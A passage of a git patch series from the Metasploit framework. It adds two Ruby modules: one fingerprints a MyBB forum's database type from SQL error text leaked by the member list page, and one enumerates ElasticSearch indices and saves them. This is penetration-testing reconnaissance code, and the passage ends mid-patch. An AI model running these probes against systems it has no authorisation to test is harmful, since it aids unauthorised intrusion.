From f9f2c401ca141216094be295ed52bf0986ce20b6 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 14 Feb 2014 13:12:43 -0800 Subject: [PATCH 01/47] Create myBB_GetTypeDB This exploit allows you to specify the type of database forum Mybb. Works by the operator wrongly used REGEXP. Which is not supported in postgreSQL and SQLite databases. --- modules/exploits/multi/http/myBB_GetTypeDB | 118 +++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 modules/exploits/multi/http/myBB_GetTypeDB diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/exploits/multi/http/myBB_GetTypeDB new file mode 100644 index 0000000000..a39fd38c09 --- /dev/null +++ b/modules/exploits/multi/http/myBB_GetTypeDB @@ -0,0 +1,118 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MyBB type database extractor', + 'Description' => %q{ + This module exploits vulnerability in MyBB. + Provide type of database in forum + This affects versions <= 1.6.12 + }, + 'Author' => + [ + 'Arthur Karmanovskii', # Discovery + 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ '0 - days', '2014-13-02' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) + ], self.class) + end + + def check + begin + print_status("URI: #{datastore['TARGETURI']}") + uri = normalize_uri(target_uri.path, '/index.php') + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Keep-Alive', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + rescue + print_error("Unable to connect to server.") + return CheckCode::Unknown + end + + if res.code != 200 + print_error("Unable to query to host") + return CheckCode::Unknown + end + + php_version = res['X-Powered-By'] + if php_version + print_good("PHP Version: #{php_version}") + else + print_status("Unknown PHP Version") + return CheckCode::Unknown + end + + _Version_server = res['Server'] + if _Version_server + print_good("Server Version: #{_Version_server}") + else + print_status("Unknown Server Version") + return CheckCode::Unknown + end + return CheckCode::Detected + end + + def exploit + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else response.body.match(/Member List/) + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + + end +end + From 81e89eadba0830ba1b88667ccbda6b2f7d725c5e Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 10:21:05 -0800 Subject: [PATCH 02/47] Rename modules/exploits/multi/http/myBB_GetTypeDB to modules/auxiliary/analyse/myBB_GetTypeDB.rb On the advice of "wvu-r7" moved module. --- .../http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/{exploits/multi/http/myBB_GetTypeDB => auxiliary/analyse/myBB_GetTypeDB.rb} (100%) diff --git a/modules/exploits/multi/http/myBB_GetTypeDB b/modules/auxiliary/analyse/myBB_GetTypeDB.rb similarity index 100% rename from modules/exploits/multi/http/myBB_GetTypeDB rename to modules/auxiliary/analyse/myBB_GetTypeDB.rb From 396ff8adaaa71eddde168f784fe851e0089190dc Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Wed, 19 Feb 2014 11:33:57 -0800 Subject: [PATCH 03/47] Rename modules/auxiliary/analyse/myBB_GetTypeDB.rb to modules/auxiliary/analyze/myBB_GetTypeDB.rb Sorry again :( --- modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/{analyse => analyze}/myBB_GetTypeDB.rb (100%) diff --git a/modules/auxiliary/analyse/myBB_GetTypeDB.rb b/modules/auxiliary/analyze/myBB_GetTypeDB.rb similarity index 100% rename from modules/auxiliary/analyse/myBB_GetTypeDB.rb rename to modules/auxiliary/analyze/myBB_GetTypeDB.rb From 162527c0e4d82cfcd926fdd696575f37d47d487d Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Thu, 6 Mar 2014 09:43:23 -0800 Subject: [PATCH 04/47] Update and rename modules/auxiliary/analyze/myBB_GetTypeDB.rb to modules/auxiliary/gather/myBB_GetTypeDB.rb Minor changes and bug: "Msf :: Auxiliary" - forgot to change --- .../{analyze => gather}/myBB_GetTypeDB.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) rename modules/auxiliary/{analyze => gather}/myBB_GetTypeDB.rb (92%) diff --git a/modules/auxiliary/analyze/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb similarity index 92% rename from modules/auxiliary/analyze/myBB_GetTypeDB.rb rename to modules/auxiliary/gather/myBB_GetTypeDB.rb index a39fd38c09..5b14a969c7 100644 --- a/modules/auxiliary/analyze/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 25) rescue print_error("Unable to connect to server.") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end if res.code != 200 print_error("Unable to query to host") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end php_version = res['X-Powered-By'] @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("PHP Version: #{php_version}") else print_status("Unknown PHP Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end _Version_server = res['Server'] @@ -80,12 +80,12 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Server Version: #{_Version_server}") else print_status("Unknown Server Version") - return CheckCode::Unknown + return Exploit::CheckCode::Unknown end - return CheckCode::Detected + return Exploit::CheckCode::Detected end - def exploit + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') response = send_request_raw( { @@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("Database is: PostgreSQL ;)") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) print_good("Database is: SQLite ;)") - else response.body.match(/Member List/) + else print_status("Database MySQL or this is not forum MyBB or unknown Database") end From 6d748f49d31c7524511d6501c6490236b33b812f Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 7 Mar 2014 10:49:30 -0800 Subject: [PATCH 05/47] Update myBB_GetTypeDB.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 1.I added comment header; 2.I made ​​a link to your account as a comment; 3.I added a link https://github.com/rapid7/metasploit-framework/pull/3070 Items 2 and 3 on the advice wchen-r7 --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 5b14a969c7..9106a4f746 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -1,3 +1,8 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' class Metasploit3 < Msf::Auxiliary @@ -15,13 +20,13 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Arthur Karmanovskii', # Discovery - 'http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812' # Metasploit Module + # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ '0 - days', '2014-13-02' ] + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] ], 'Privileged' => false, 'Platform' => ['php'], @@ -115,4 +120,3 @@ class Metasploit3 < Msf::Auxiliary end end - From b032f2c2700f02ec1d7e1e4c9c49ce697118f2d9 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:31:24 -0400 Subject: [PATCH 06/47] Added Elastic Search Enum --- .../scanner/elasticsearch/es_enum.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/auxiliary/scanner/elasticsearch/es_enum.rb diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb new file mode 100644 index 0000000000..ed41a17cc2 --- /dev/null +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + # Exploit mixins should be called first + include Msf::Exploit::Remote::HttpClient + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => 'Send a request to enumerate ElasticSearch indices', + 'Author' => ['Silas Cutler MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9200) + ] + ) + + end + + def run_host(target_host) + + begin + res = send_request_raw({ + 'uri' => '/_aliases', + 'method' => 'GET', + 'version' => '1.0', + }, 10) + + if res.nil? + print_error("No response for #{target_host}") + return nil + end + + begin + temp = JSON.parse(res.body) + rescue JSON::ParserError + print_error("Unable to parse JSON") + return + end + + + if (res.code == 200) + temp.each do |index| + print_good("Index : " + index[0]) + end + end + + if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 + path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + print_status("Results saved to #{path}") + else + print_error("Failed to save the result") + end + + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end From 975c2adbadf5f4c99d2d23cc4b9982cd107c6550 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:34:45 -0400 Subject: [PATCH 07/47] Fixed spaces issues --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index ed41a17cc2..a67961323d 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) register_options( - [ + [ Opt::RPORT(9200) ] ) @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if (res.code == 200) temp.each do |index| - print_good("Index : " + index[0]) + print_good("Index : " + index[0]) end end From ad4c3544604ad9716c518393c51a41d9f981c29f Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 17 Mar 2014 13:38:33 -0400 Subject: [PATCH 08/47] Update es_enum.rb Corrected changes from dev module --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a67961323d..d74af4984b 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") print_status("Results saved to #{path}") else print_error("Failed to save the result") From d36159710409c6d07e312f0980f506845662d5f4 Mon Sep 17 00:00:00 2001 From: silascutler Date: Tue, 18 Mar 2014 09:20:04 -0400 Subject: [PATCH 09/47] Update es_enum.rb --- .../scanner/elasticsearch/es_enum.rb | 48 +++++++------------ 1 file changed, 18 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index d74af4984b..a44eea1cee 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -3,35 +3,32 @@ # Current source: https://github.com/rapid7/metasploit-framework ## - require 'msf/core' - class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient - # Scanner mixin should be near last include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => 'Send a request to enumerate ElasticSearch indices', - 'Author' => ['Silas Cutler MSF_LICENSE - ) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Author' => + [ + 'Silas Cutler ' + ], + 'License' => MSF_LICENSE + )) + register_options( [ Opt::RPORT(9200) - ] - ) - + ], self.class) end - def run_host(target_host) - + def run_host(ip) begin res = send_request_raw({ 'uri' => '/_aliases', @@ -39,33 +36,24 @@ class Metasploit3 < Msf::Auxiliary 'version' => '1.0', }, 10) - if res.nil? - print_error("No response for #{target_host}") - return nil - end - begin - temp = JSON.parse(res.body) + json_body = JSON.parse(res.body) rescue JSON::ParserError print_error("Unable to parse JSON") return end - - if (res.code == 200) - temp.each do |index| + if res and res.code == 200 and res.body.length > 0 + json_body.each do |index| print_good("Index : " + index[0]) end - end - if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 - path = store_loot("elasticsearch.enum.file", "text/plain", rhost, res.body, "ElasticSearch Enum Results") - print_status("Results saved to #{path}") + path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") + print_good("Results saved to #{path}") else print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout rescue ::Timeout::Error, ::Errno::EPIPE end From 0b51e7459c2e1730fb3c63cf16f8530a7f751bf8 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 24 Mar 2014 12:19:51 -0700 Subject: [PATCH 10/47] Update myBB_GetTypeDB.rb I have added detection MyBB forum. --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 95 ++++++++++++---------- 1 file changed, 53 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb index 9106a4f746..46e0a0ad9a 100644 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ b/modules/auxiliary/gather/myBB_GetTypeDB.rb @@ -4,7 +4,6 @@ ## require 'msf/core' - class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking @@ -46,49 +45,61 @@ class Metasploit3 < Msf::Auxiliary def check begin - print_status("URI: #{datastore['TARGETURI']}") - uri = normalize_uri(target_uri.path, '/index.php') - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Keep-Alive', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - rescue - print_error("Unable to connect to server.") - return Exploit::CheckCode::Unknown - end - - if res.code != 200 - print_error("Unable to query to host") - return Exploit::CheckCode::Unknown - end - - php_version = res['X-Powered-By'] - if php_version - print_good("PHP Version: #{php_version}") - else - print_status("Unknown PHP Version") - return Exploit::CheckCode::Unknown - end - _Version_server = res['Server'] - if _Version_server - print_good("Server Version: #{_Version_server}") - else - print_status("Unknown Server Version") - return Exploit::CheckCode::Unknown - end - return Exploit::CheckCode::Detected + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + end + + def run uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') From b11df0eaf0e095701ba185fc229aaf718b4f02f5 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Fri, 28 Mar 2014 16:47:49 -0700 Subject: [PATCH 11/47] Update and rename myBB_GetTypeDB.rb to mybb_get_type_db.rb --- modules/auxiliary/gather/myBB_GetTypeDB.rb | 133 ------------------- modules/auxiliary/gather/mybb_get_type_db.rb | 129 ++++++++++++++++++ 2 files changed, 129 insertions(+), 133 deletions(-) delete mode 100644 modules/auxiliary/gather/myBB_GetTypeDB.rb create mode 100644 modules/auxiliary/gather/mybb_get_type_db.rb diff --git a/modules/auxiliary/gather/myBB_GetTypeDB.rb b/modules/auxiliary/gather/myBB_GetTypeDB.rb deleted file mode 100644 index 46e0a0ad9a..0000000000 --- a/modules/auxiliary/gather/myBB_GetTypeDB.rb +++ /dev/null @@ -1,133 +0,0 @@ -## -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' -class Metasploit3 < Msf::Auxiliary - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'MyBB type database extractor', - 'Description' => %q{ - This module exploits vulnerability in MyBB. - Provide type of database in forum - This affects versions <= 1.6.12 - }, - 'Author' => - [ - # http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii ' # Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Feb 13 2014')) - - register_options( - [ - OptString.new('TARGETURI', [ true, "MyBB forum directory path", 'http://localhost/forum']) - ], self.class) - end - - def check - begin - - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_raw({ - 'uri' => uri, - 'method' => 'GET',}) - if (req) - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") - return Exploit::CheckCode::Unknown - end - - #Check PhP - php_version = res['X-Powered-By'] - if php_version - php_version = " PHP Version: #{php_version}".ljust(40) - else - php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? - end - - #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) - else - _Version_server = " Server Version: unknown".ljust(40) - end - - #Check forum MyBB - if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Detected - else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") - return Exploit::CheckCode::Unknown - end - - - end - - - - def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') - response = send_request_raw( - { - 'method' => 'GET', - 'uri' => uri, - 'headers' => - { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" - } - }, 25) - if response.nil? - fail_with(Failure::NotFound, "Failed to retrieve webpage.") - end - #Resolve response - if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") - elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") - else - print_status("Database MySQL or this is not forum MyBB or unknown Database") - end - - end -end diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb new file mode 100644 index 0000000000..e20d863f2d --- /dev/null +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Determinant Databases MyBB ', + 'Description' => %q{ + Determine the database in the forum. + This affects versions <= 1.6.12 + }, + 'Author' => + [ + #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 + 'Arthur Karmanovskii '#Discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Feb 13 2014')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "MyBB forum directory path", '/forum']) + ], self.class) + end + + def check + begin + uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + req = nclient.request_raw({ + 'uri' => uri, + 'method' => 'GET',}) + if (req) + res = nclient.send_recv(req, 1024) + else + print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") + return Exploit::CheckCode::Unknown + end + if res.code != 200 + print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + return Exploit::CheckCode::Unknown + end + + #Check PhP + php_version = res['X-Powered-By'] + if php_version + php_version = " PHP Version: #{php_version}".ljust(40) + else + php_version = " PHP Version: unknown".ljust(40) + #return Exploit::CheckCode::Unknown # necessary ???? + end + + #Check Web-Server + _Version_server = res['Server'] + if _Version_server + _Version_server = " Server Version: #{_Version_server}".ljust(40) + else + _Version_server = " Server Version: unknown".ljust(40) + end + + #Check forum MyBB + if res.body.match("MYBB") + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Detected + else + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + return Exploit::CheckCode::Unknown + end + rescue RuntimeError => err + print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") + return Exploit::CheckCode::Unknown + end + + + end + + + def run + uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + response = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri, + 'headers' => + { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }, 25) + if response.nil? + fail_with(Failure::NotFound, "Failed to retrieve webpage.") + end + + #Resolve response + if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) + print_good("Database is: PostgreSQL ;)") + elsif response.body.match(/General error\: 1 no such function\: REGEXP/) + print_good("Database is: SQLite ;)") + else + print_status("Database MySQL or this is not forum MyBB or unknown Database") + end + end +end From 3788f136d9aaf371c23772678fce314a3b157f95 Mon Sep 17 00:00:00 2001 From: silascutler Date: Tue, 1 Apr 2014 11:43:15 -0400 Subject: [PATCH 12/47] Update es_enum.rb Updated based on comments. --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index a44eea1cee..0e8735fdc5 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -33,8 +33,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', - 'version' => '1.0', - }, 10) + }) begin json_body = JSON.parse(res.body) @@ -54,8 +53,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Failed to save the result") end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable end end end From c035715a711f507b5895f429c60a3a6f7f88fc8c Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:50:53 -0700 Subject: [PATCH 13/47] Update mybb_get_type_db.rb Changed the name of the variable _Version_server on _version_server according to the recommendation of jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e20d863f2d..58d01b6d58 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -73,19 +73,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = res['Server'] + if _version_server + _version_server = " Server Version: #{_Version_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + _version_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) 